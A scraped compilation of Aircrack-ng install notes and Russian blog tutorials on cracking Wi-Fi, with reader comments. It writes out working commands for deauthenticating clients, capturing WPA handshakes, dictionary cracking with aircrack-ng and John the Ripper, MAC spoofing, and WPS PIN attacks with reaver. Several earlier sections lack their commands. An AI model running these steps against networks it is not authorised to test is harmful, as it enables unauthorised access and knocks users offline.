- Aircrack-ng
- User Tools
- Site Tools
- Table of Contents
- Installing Aircrack-ng from Source
- Requirements
- Linux
- Windows (Cygwin)
- FreeBSD, OpenBSD, NetBSD, Solaris
- Optional stuff
- Compiling and installing
- Current version
- Compiling with AirPcap support (cygwin only)
- Compiling on *BSD
- Compiling on OS X
- Latest Git (development) Sources
- ./configure flags
- Troubleshooting Tips
- error while loading shared libraries: libaircrack-ng.so.0
- «command not found» error message
- Installing pre-compiled binaries
- Linux/BSD/OSX
- Windows
- HackWare.ru
- Этичный хакинг и тестирование на проникновение, информационная безопасность
- Как установить последнюю версию aircrack-ng в Linux Mint или Ubuntu
- Как в Linux Mint и Ubuntu установить aircrack-ng из исходного кода
- Как использовать Aircrack-ng в Linux Mint и Ubuntu
- Ethical hacking and penetration testing
- InfoSec, IT, Kali Linux, BlackArch
- How to install the latest aircrack-ng release in Linux Mint or Ubuntu
- How to install the aircrack-ng from sources in Linux Mint or Ubuntu
- Подбор пароля Wi-Fi утилитой aircrack-ng
- Введение
- А где же уязвимость?
- Так как же взломать?
- Шаг 1. Определяем интерфейс
- Шаг 2. Переводим сетевой адаптер в режим мониторинга
- Шаг 3. Перехватываем трафик
- Шаг 4. Концентрируем перехват на конкретной точке доступа.
- Шаг 5. Получение handshake
- Шаг 6. Подбираем пароль
- Сколько времени это займёт?
- Взлом Wi-Fi сетей, Aircrack-ng, Kali Linux.
- WPA/WPA2.
- handshake.
- Взлом.
- Создание своих словарей.
- Обход фильтра MAC адреса.
- Атака на WPS.
- Алгоритм атаки:
- Все пошло не так!
- 21 ответ на “ Взлом Wi-Fi сетей, Aircrack-ng, Kali Linux. ”
Aircrack-ng
User Tools
Site Tools
Table of Contents
Installing Aircrack-ng from Source
Legacy information can be found here.
Requirements
Linux
Windows (Cygwin)
Install the following via Homebrew (brew):
FreeBSD, OpenBSD, NetBSD, Solaris
Install the following via pkg:
Optional stuff
Compiling and installing
Current version
Compiling with AirPcap support (cygwin only)
Compiling on *BSD
Commands are exactly the same as Linux but instead of make, use gmake (with CC=gcc5 CXX=g++5 or any more recent gcc version installed).
Compiling on OS X
Commands are exactly the same as Linux
Latest Git (development) Sources
Note: Compilation parameters can also be used with the sources from our git repository.
./configure flags
When configuring, the following flags can be used and combined to adjust the suite to your choosing:
Troubleshooting Tips
error while loading shared libraries: libaircrack-ng.so.0
Run ldconfig as root or with “sudo” to solve the issue.
«command not found» error message
After you do “make install” then try to use any of the Aircrack-ng suite commands, you get the error message “command not found” or similar. Your system will look for the Aircrack-ng commands in the directories defined by the PATH command.
Normally, the Aircrack-ng suite programs and man pages are placed in:
On your system, to determine which directories have the Aircrack-ng programs enter the following. If using “locate” be sure to first run “updatedb”.
Once you know the directories (exclude the source directories) then determine which directories are in your PATH. To see which directories are included in PATH on your particular system enter:
It should show something like:
At this point compare the actual locations with the directories in your PATH. If the directories are missing from your PATH then you have a few options:
Installing pre-compiled binaries
Linux/BSD/OSX
We offer packages for a number of Linux distributions in 64 bit thanks to PackageCloud.io so you can use your distro’s package manager to install and keep Aircrack-ng up to date:
While most folks want to use our “release” packages, “git” packages are available too for those who decide to use bleeding edge.
More details about them can be found in our blog post.
On OSX, install it is via Macports or brew. Simply do “brew install aircrack-ng” or “sudo ports install aircrack-ng”
Windows
The Windows version of the Aircrack-ng suite does not have an install program. You must manually install (unzipping archive) the software.
Here are the steps to follow for Windows:
Prior to using the software, make sure to install the drivers for your particular wireless card. See this link for the instructions. We currently only support Airpcap; other adapters may be supported but require development of your own DLL so the different tools can interact with it.
To now use the Aircrack-ng suite, start Windows Explorer and double click on Aircrack-ng GUI .exe inside “bin” subdirectory. The GUI requires .NET version 4.6.1 to run.
Источник
HackWare.ru
Этичный хакинг и тестирование на проникновение, информационная безопасность
Как установить последнюю версию aircrack-ng в Linux Mint или Ubuntu
Aircrack-ng — это набор инструментов для аудита беспроводных сетей.
В стандартных репозиториях Linux Mint и Ubuntu присутствует aircrack-ng, поэтому установка этого пакета очень проста:
Но в репозиториях, а соответственно теперь и нашей системе, старая версия aircrack-ng.
В этом легко убедиться следующей командой:
Как можно увидеть, в репозиториях Linux Mint и Ubuntu имеется 1.2-0
beta3 релиз. Версия aircrack-ng 1.2-beta3 была выпущена 31 октября 2014 года. Как можно убедиться, посмотрев официальный список изменений, после этого релиза было сделано ещё несколько, каждый из которых имеет много исправлений и улучшений.
Это не повод впадать в отчаяние, вы можем получить самую последнюю версию aircrack-ng на нашем домашнем компьютере с операционной системой Linux Mint или Ubuntu. Мы установим её из исходников.
Как в Linux Mint и Ubuntu установить aircrack-ng из исходного кода
Удалите aircrack-ng если пакет уже установлен:
Установите зависимости aircrack-ng, которые необходимы для компиляции и работы этой программы:
Загружаем исходный код aircrack-ng, компилируем и устанавливаем aircrack-ng:
Обновляем базу данных OUI:
Проверяем, чтобы убедиться, что в нашей системе Linux Mint действительно установлена самая последняя версия Aircrack-ng 1.2 rc4:
В специализированных дистрибутивах, таких как Kali Linux и BlackArch уже установлен последний релиз Aircrack-ng, поэтому в этих ОС не нужно делать установку из исходного кода.
Как использовать Aircrack-ng в Linux Mint и Ubuntu
Ознакомиться с теорией и практикой использования Aircrack-ng вы сможете по статье «Как взломать Wi-Fi».
Источник
Ethical hacking and penetration testing
InfoSec, IT, Kali Linux, BlackArch
How to install the latest aircrack-ng release in Linux Mint or Ubuntu
It is very easy to install aircrack-ng from standard Linux Mint or Ubuntu repositories:
But what is the aircrack-ng version you get?
It is easy to check even without package installation:
As you can see, in the Linux Mint and Ubuntu repositories is 1.2-0
beta3 release. aircrack-ng 1.2-beta3 was released on 31 October 2014. As you can check in the official changelog, after that release it was more new versions with very many fixes and improvements.
Cheer up; we still can get the most recent aircrack-ng release on our Linux Mint or Ubuntu system. We will install it from sources.
How to install the aircrack-ng from sources in Linux Mint or Ubuntu
Remove aircrack-ng if you already installed it:
Install aircrack-ng dependencies, necessary for compilation and running the program:
Download aircrack-ng source, compile and install aircrack-ng:
Update OUI database:
As you can noticed, we got the latest Aircrack-ng 1.2 rc4 release on Linux Mint:
Источник
Подбор пароля Wi-Fi утилитой aircrack-ng
Данная статья написана исключительно в ознакомительных и исследовательских целях. Призываем вас соблюдать правила работы с сетями и закон, а также всегда помнить об информационной безопасности.
Введение
В начале 1990-х годов, когда Wi-Fi только появился, был создан алгоритм Wired Equivalent Privacy, который должен был обеспечивать конфиденциальность Wi-Fi сетей. Однако, WEP оказался неэффективным алгоритмом защиты, который легко взломать.
На смену пришел новый алгоритм защиты Wi-Fi Protected Access II, который сегодня применяют большинство точек доступа Wi-Fi. WPA2 использует алгоритм шифрования, AES, взломать который крайне сложно.
А где же уязвимость?
Недостаток WPA2 заключается в том, что зашифрованный пароль передается при подключении пользователей во время так называемого 4-way handshake (4-х стороннего рукопожатия). Если мы поймаем handshake, то узнаем зашифрованный пароль и нам останется лишь расшифровать его. Для этой цели мы воспользуемся aircrack-ng.
Так как же взломать?
Шаг 1. Определяем интерфейс
Для начала нужно узнать, какой сетевой интерфейс нам нужен, для этого вводим команду:
В моем случае всего три интерфейса, два из которых не имеют беспроводных расширений (no wireless extensions). Поэтому нас интересует только wlan0.
Шаг 2. Переводим сетевой адаптер в режим мониторинга
Перевод сетевого адаптера в режим мониторинга позволит нам видеть беспроводной трафик, подходящий рядом с нами. Для того чтобы сделать это, вводим команду:
Обратите внимание, что airmon-ng переименовал ваш интерфейс (у меня он стал называться mon0, но вам, все же, стоит проверить).
Шаг 3. Перехватываем трафик
Теперь, когда наш сетевой адаптер находится в режиме мониторинга, мы можем захватить, подходящий мимо нас трафик, используя команду airodump-ng. Вводим:
Обратите внимание, что все видимые точки доступа перечислены в верхней части экрана, а клиенты — в нижней части экрана.
Шаг 4. Концентрируем перехват на конкретной точке доступа.
Наш следующий шаг — сосредоточить наши усилия на одной из точек доступа и на ее канале. Нас интересует BSSID и номер канала точки доступа, которую мы будем взламывать. Давайте откроем еще один терминал и введем:
- 08:86:30:74:22:76 BSSID точки доступа
- -c 6 канал на котором работает точка доступа Wi-Fi
- WPAcrack файл в который запишется handshake
- mon0 сетевой адаптер в режиме мониторинга
Как вы можете видеть на скриншоте выше, мы сейчас концентрируемся на захвате данных с одной точки доступа с ESSID Belkin276 на канале 6. Терминал оставляем открытым!
Шаг 5. Получение handshake
Чтобы захватить зашифрованный пароль, нам нужно, чтобы клиент прошел аутентификацию (подключился к Wi-Fi). Если он уже аутентифицирован, мы можем его деаутентифицировать (отключить), тогда система автоматически повторно аутентифицируется (подключится), в результате чего мы можем получить зашифрованный пароль.
То есть нам просто нужно отключить подключенных пользователей, чтобы они подключились снова. Для этого открываем ещё один терминал и вводим:
- 100 количество пользователей, которые будут деаутентифицированы
- 08:86:30:74:22:76 BSSID точки доступа
- mon0 сетевой адаптер
Теперь при повторном подключении окно которое мы оставили на предыдущем шаге поймает handshake. Давайте вернемся к нашему терминалу airodump-ng и посмотрим.
Обратите внимание на верхнюю строку справа, airodump-ng вывел: «Handshake WPA». То есть, мы успешно захватили зашифрованный пароль! Это первый шаг к успеху!
Шаг 6. Подбираем пароль
Теперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack, мы можем запустить подбор пароля. Но для этого нам нужно иметь список с паролями которые мы хотим использовать. Найти такой список можно за 5 минут в Гугле. Я, же, буду использовать список паролей по умолчанию, включенный в aircrack-ng: BackTrack darkcOde.
Открываем новый терминал и вводим:
- WPAcrack-01.cap файл в который мы записывали handshake (airodump-ng приписал в конце -01.cap)
- /pentest/passwords/wordlist/darkc0de абсолютный путь к списку паролей
Сколько времени это займёт?
Этот процесс может занять много времени. Все зависит от длины вашего списка паролей, вы можете ждать от нескольких минут до нескольких дней. На моем двухъядерном процессоре Intel aircrack-ng подбирает чуть более 800 паролей в секунду.
Когда пароль будет найден, он появится на вашем экране. Будет ли подбор пароля успешным или нет, зависит от вашего списка. Если у вас не получилось подобрать пароль по одному списку, не отчаивайтесь, попробуйте другой.
Источник
Взлом Wi-Fi сетей, Aircrack-ng, Kali Linux.
В этой статье мы познакомимся с популярными методами взлома Wi-Fi сетей. Надеюсь после прочтения, вы сделает более безопасной свою сеть. Как говориться : предупрежден значит вооружен )
WPA/WPA2.
WPA и WPA2 (Wi-Fi Protected Access) собственно это протокол авторизации и шифрования данных в Wi-Fi сетях. На данный момент это самый популярный, самый надежный протокол. Часто в домашних условиях и маленьких сетях используют WPA2-PSK(Pre-Shared Key). В начале 2018 года международный альянс Wi-Fi Alliance анонсировал новейший протокол беспроводной безопасности — WPA3.
Основной и самый популярный метод атаки на этот протокол является брутфорс(метод грубой силы, перебор паролей).
handshake.
Для того, чтобы устройство получило маркер доступа в сеть, на устройстве необходимо ввести специальную парольную фразу, называемую Pre-Shared Key . Длина должна быть от 8 до 32 символов, притом можно использовать специальные символы, а также символы национальных алфавитов. После ввода парольной фразы она помещается в специальный пакет ассоциации (пакет обмена ключами, handshake), который передается на точку доступа. Если парольная фраза верна, то устройству выдается маркер доступа в сеть.
Уязвимостью является возможность перехвата пакетов handshake, в которых передается Pre-Shared Key при подключении устройства к сети. По скольку Pre-Shared key шифруется, у злоумышленника остается только одна возможность – атака грубой силой на захваченные пакеты. Также стоит обратить внимание, что для того, чтобы перехватить handshake злоумышленнику совсем не обязательно ждать того момента, как к сети будет подключено новое устройство. На некоторых беспроводных адаптерах, при использовании нестандартных драйверов, есть возможность посылки в сеть пакетов, которые будут прерывать сетевые соединения и инициировать новый обмен ключами в сети между клиентами и точкой доступа. В таком случае, для того, чтобы захватить требуемые пакеты, необходимо, чтобы к сети был подключен хотя бы один клиент.
Взлом.
В наших примеров я использую Kali Linux (Kali Linux — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность). И пакет уже установленных программ Airocrack-ng (Это полный набор инструментов для оценки безопасности сети Wi-Fi.)
Первым этапом нам надо перевести наш Wi-Fi адаптер в режим мониторинга. То есть чип адаптера переводиться в режим прослушивания эфира. Все пакеты которые отсылают друг другу в округе.
Сначала мы убьем все процессы которые используют Wi-Fi интерфейс:
airmon-ng check kill
Запустите беспроводной интерфейс в режиме мониторинга:
airmon-ng start wlan0
В результате у вас появиться новый интерфейс wlan0mon с ним дальше мы и будем работать (посмотреть доступные интерфейсы можно командой ifconfig ). Теперь мы можем посмотреть что же происходит вокруг:
airodump-ng wlan0mon
- BSSID — MAC адрес WI-Fi точки.
- PWR — Сила сигнала.
- Beacons — Фрейм Бикон (Beacon frame) /Точка доступа WiFi периодически отправляет Биконы для анонсирования своего присутствия и предоставления необходимой информации (SSID, частотный канал, временные маркеры для синхронизации устройств по времени, поддерживаемые скорости, возможности обеспечения QoS и т.п.) всем устройствам в зоне ее покрытия. Радиокарты пользовательских устройств периодически сканируют все каналы 802.11 и слушают биконы, как основу для выбора лучшей точки доступа для ассоциации. Пользовательские устройства обычно не посылают биконы, за исключением ситуации, когда выполняется процедура участия в IBSS (Independent Basic Service Set) или, по другому, в одноранговом соединении типа Ad-hoc.
- CH — Номер канала точки доступа.
- ENC- Используемый алгоритм. OPN = нет шифрования, «WEP?» = WEP или выше (недостаточно данных для выбора между WEP и WPA/WPA2), WEP (без знака вопроса) показывает статичный или динамичный WEP, и WPA или WPA2 если представлены TKIP или CCMP или MGT.
- CIPHER — Обнаруженный шифр. Один из CCMP, WRAP, TKIP, WEP, WEP40, или WEP104. Не обязательно, но обычно TKIP используется с WPA, а CCMP обычно используется с WPA2. WEP40 показывается когда индекс ключа больше 0. Стандартные состояния: индекс может быть 0-3 для 40 бит и должен быть 0 для 104 бит.
- AUTH —Используемый протокол аутентификации. Один из MGT (WPA/WPA2 используя отдельный сервер аутентификации), SKA (общий ключ для WEP), PSK (предварительно согласованный ключ для WPA/WPA2) или OPN (открытый для WEP).
- ESSID — Так называемый SSID, который может быть пустым, если активировано сокрытие SSID. В этом случае airodump-ng попробует восстановить SSID из зондирующих запросов ассоциирования.
- STATION —MAC адрес каждой ассоциированной клиента подключенного к точке доступа. Клиенты, в настоящий момент не ассоциированные с точкой доступа, имеют BSSID «(not associated)».
Можете немного поиграться :
airodump-ng —manufacturer —uptime —wps wlan0mon
Запускаем airodump-ng для беспроводного интерфейса wlan0mon, кроме основной информации мы задаём отображать производителя (—manufacturer), время работы (—uptime) и информацию о WPS (—wps).
-c номер канал.
—bssid мас адрес точки доступа
-w файл в который будут сохранены все перехваченные пакты.
wlan0mon Название беспроводного интерфейса интерфейса.
После удачного захвата рукопожатий в правом углу будет надпись WPA handshake
Кстати мы можем попытаться ускорить процесс , заставив клиента переподключиться к точки доступа :
aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
—deauth — отправка запроса деаунтифицировать. (0 не ограниченное число пакетов)
-a — Мас адрес точки доступа.
-с — Мас адрес клиента.
wlan0mon — интерфейс.
Другие виды атак :
Теперь нам надо расшифровать его и узнать PSK:
aircrack-ng -w wordlist.dic -b C0:4A:00:F0:F4:24 WPA.cap
-w — Указываем словарь для перебора паролей.
-b — Мас адрес точки доступа.
WPA.cap — Файл с handshake.
aircrack-ng всем хорош, но у него нету функции паузы и запоминания места где вы остановились. Это очень не удобно когда у вас огромный словарь ) Мы это справим программой John The Ripper (свободная программа, предназначенная для восстановления паролей по их хешам. Основное назначение программы — аудит слабых паролей в UNIX системах путем перебора возможных вариантов.Она уже есть в дистрибутиве).
john —session=foo —stdout —wordlist=wordlist.dic | aircrack-ng -w — -b 00:11:22:33:44:55 WPA.cap
То есть мы будем брать пароли из словаря этой программной и направлять их в aircrack-ng.
—session — Имя сессии.
— stdout — Путь к словарю.
Для паузы нам надо нажать q или ctrl+c. Программа создаст специальный файл с сессией и запомнит место где мы остановились. Продолжить сессию мы можем командой :
john —restore=foo | aircrack-ng -w — -b 00:11:22:33:44:55 WPA.cap
Создание своих словарей.
При атаках типа брутфорс словари играют очень важную роль. Я думаю вы с легкость найдете в интернете куча всяких не понятных словарей. Но еще можно и нужно делать самому.
Для этого в дистрибутиве Kali Linux есть интересная утилита, называется Crunch. Синтаксис ее довольно прост:
- min = минимальная длина пароля;
- max = максимальная длина;
- characterset = символы, которые будут использоваться для генерации паролей;
- -t
= возможность создавать паттерны. Давай на примере. Скажем, ты знаешь, что у человека день рождения 28 июля и эти цифры есть в пароле вида 0728, но перед этим числом есть еще какие-то символы. Поэтому ты пишешь что-то вроде @@@@@@@0728, и получается, что лист будет сгенерирован на 11 -значный пароль. Семь символов, которые будут генериться, а четыре будут фиксированными. По мне, так весьма крутая и удобная фишка;
crunch 4 8
Как сам понимаешь, кранч будет генерить пароли от 4 до 8 символов. Как видишь, ничего сложного, теперь давай что-нибудь поинтереснее:
crunch 6 8 1234567890 -о /гооt/wordlist.txt
Здесь будет сгенерирован словарь от 6 до 8 символов, в пароле только цифры и зальются они во внешний файл, что мы указали. Остается только воспользоваться получившимся словарем.
crunch 1 1 -p Alex Company Position
Словарь состоит из всех возможных комбинаций слов Alex, Company и Position.
Для тега -t есть шаблоны :
- ^ — спецсимволы.
- @ — буквы в нижнем регистре.
- , — буквы в верхнем регистре.
- % — цифры.
Обход фильтра MAC адреса.
Иногда в точках доступа включают фильтрации по пользователе по MAC. Так вот, это совсем бесполезна штука.
В Linux системах вы можете свободно поменять ваш МАС адрес на любой:
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:AA:AA:AA
ifconfig wlan0 up
Предварительно нужно отключить любые mon-интерфейсы. Проверить, заработала ли подмена, можно вызвав ifconfig wlan0 — в строке Hwaddr должен быть указанный выше MAC.
Кроме того, в *nix есть macchanger — с его помощью можно выставить себе случайный MAC. Если поставить его в init.d, то неприятель будет совершенно сбит с толку, так как при каждой загрузке наш MAC будет другим (работает для любых проводных и беспроводных адаптеров, как и ifconfig).
# Случайный MAC:
macchanger -r wlan0
# Определённый MAC:
macchanger -m 11:22:33:AA:BB:CC wlan0
# Показать MAC:
macchanger -s wlan0
В Kali Linux есть база данных валидных MAC адресов:
- /var/lib/ieee-data/oui.txt
- /var/lib/ieee-data/oui36.txt.
- /var/lib/ieee-data/iab.txt
- /var/lib/ieee-data/mam.txt
А обновить базу данных можно командой
airodump-ng-oui-update
Атака на WPS.
Wi-Fi Protected Setup (защищённая установка), WPS — стандарт (и одноимённый протокол) полуавтоматического создания беспроводной сети Wi-Fi.
В декабре 2011 Стефан Фибёк (англ. Stefan Viehböck) и Крейг Хеффнер (англ. Craig Heffner) рассказали о серьёзных прорехах в протоколе WPS. Оказалось, что если в точке доступа активирован WPS c PIN ( который по умолчанию включен в большинстве роутеров ), то подобрать PIN-код для подключения можно за считанные часы.
PIN-код состоит из восьми цифр — следовательно, существует 108 (100 000 000) вариантов PIN-кода для подбора. Однако количество вариантов можно существенно сократить. Дело в том, что последняя цифра PIN-кода представляет собой контрольную сумму, которая можно вычислить на основании первых семи цифр. Таким образом количество вариантов уже сокращается до 107 (10 000 000).
Авторизация по WPS предполагает отправку клиентом последовательности цифр PIN-кода и пакетов M4 или M6 и ответы на них от базовой станции. Если первые 4 цифры PIN-кода некорректны то получив их точка доступа отправит EAP-NACK сразу после получения M4, а если была ошибка в последних 3 цифрах правой части (8-ое число не считаем так как оно легко генерируется атакующим по формуле) — то после получения M6. Таким образом, недостаток протокола позволяет разделить PIN-код на две части, 4 начальные цифры и 3 последующие.
Также были обнаружены уязвимости в генераторе случайных чисел маршрутизаторов некоторых производителей. Уязвимость получила название pixie dust. Для уязвимых роутеров можно получить pin после первой попытки и оффлайн-брутфорса.
Алгоритм атаки:
- Переводим беспроводной интерфейс в режим монитора.
- Ищем цели для атаки.
- Проверяем на подверженность Pixie Dust.
- Запускаем полный перебор, если предыдущие шаги не дали результата.
- Если получен ПИН, но не показан WPA пароль, то запускаем команды для получения пароля от Wi-Fi.
Для поиска точек доступ можем воспользоваться удобной программой Wash. Wash — это утилита для идентификации точек доступа с включённым WPS. Она может искать с живого интерфейса и уже есть в Kali Linux.
Или может сканировать список pcap файлов:
wash -f capture1.pcap
Нас интересует опция Lck (No не блокирован WPS) и Vendor (производитель). Pixie Dust подвержены Ralink, Broadcom и Realtek.
Перейдем к пункту Pixie Dust. Для проверки мы будем использовать программу reaver (Reaver предназначен для подборки пина WPS (Wifi Protected Setup) методом перебора. Уже есть в Kali Linux).
reaver -i интерфейс -b MAC_адрес_точки -K
Как можно увидеть на скриншоте, Точка Доступа оказалась уязвимой, и получен её WPS пин.
Теперь нам надо узнать пароль. Для получения пароля Wi-Fi сети вам нужно в Reaver использовать опцию -p, после которой указать известный ПИН.
reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805
Все пошло не так!
Попробуем сразу вдарить молотком и запустим полный перебор пина.
reaver -i интерфейс -b MAC_адрес
Перебор WPS пинов может идти неудачно по многим причинам, поэтому для более подробного вывода, чтобы определить, в чём проблема, используются опции -v, -vv или -vvv. Как можно догадаться, чем больше букв v, тем больше будет выведено подробной информации.
При полном переборе reaver показывает но только WPS но пароль доступа к WiFi. для получения пароля Wi-Fi сети вам нужно в Reaver использовать опцию -p, после которой указать известный ПИН.
Если будут какие то проблемы можно поиграть с дополнительными опциями reaver , например так :
reaver -i wlan0mon -c 6 -a MAC —no-nacks -T .5 -d 15
—no-nacks Не отправлять сообщения NACK когда получены пакеты о неисправности.
-c Номер канала точки доступа.
-T Установить период таймаута M5/M7 по умолчанию [0.20].
-d Установить задержку между попытками пина, по умолчанию [1]
-x Установить время для паузы после 10 неожиданных неудач, по умолчанию [0].
*Особая заметка: если вы атакуете ТД Realtek, НЕ используйте малые ключи DH (-S)
Полный список опций:
Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.
21 ответ на “ Взлом Wi-Fi сетей, Aircrack-ng, Kali Linux. ”
Отличная статья! Так держать!
Очень здорово объясняете.
Спасибо за ваш комментарий )
Спасибо чел , наконец-то нормальные объяснения . Так бы для vk api в python3 было-бы идеально.
Спасибо… А с VK api вроде ничего сложного нету, понятная документация на русском. Библиотека Requests для Python в помощь.
Здравствуйте. обьясните про John The Ripper, а именно что означает: john —session=foo, что вводить вместо foo ? нужно ли указывать полный путь файлов wordlist=wordlist.dic и WPA.cap ?
«session=foo» foo это название сессии , оно может быть любым. Если перебор затянется вы можете его продолжить после паузы, указав название сессии. Все пути должны быть абсолютные вроде , например /home/user/wordlist.txt
привет. После команды airodump-ng —manufacturer —uptime —wps wlan0mon
пишет «airodump-ng —help» for help.
Это значит что вы не правильно ввели команду, возможно я опечатался где то. Там должно быть — две черточки , так же вы можете посмотреть команды airodump-ng —help.
после этой команды aireplay-ng —deauth всё зависает почему так происходит
Зависает совсем прям ? Ни какого вывода, ничего ? airodump-ng работает нормально ? Пробовали выставлять число : aireplay-ng — deauth 100 ? Возможно программа не хочет работать с вашим адаптером WiFi ((
как работать на новом kali linux 2020.1
при каждой команде выдает ошибку, и ввод пароля рут
Источник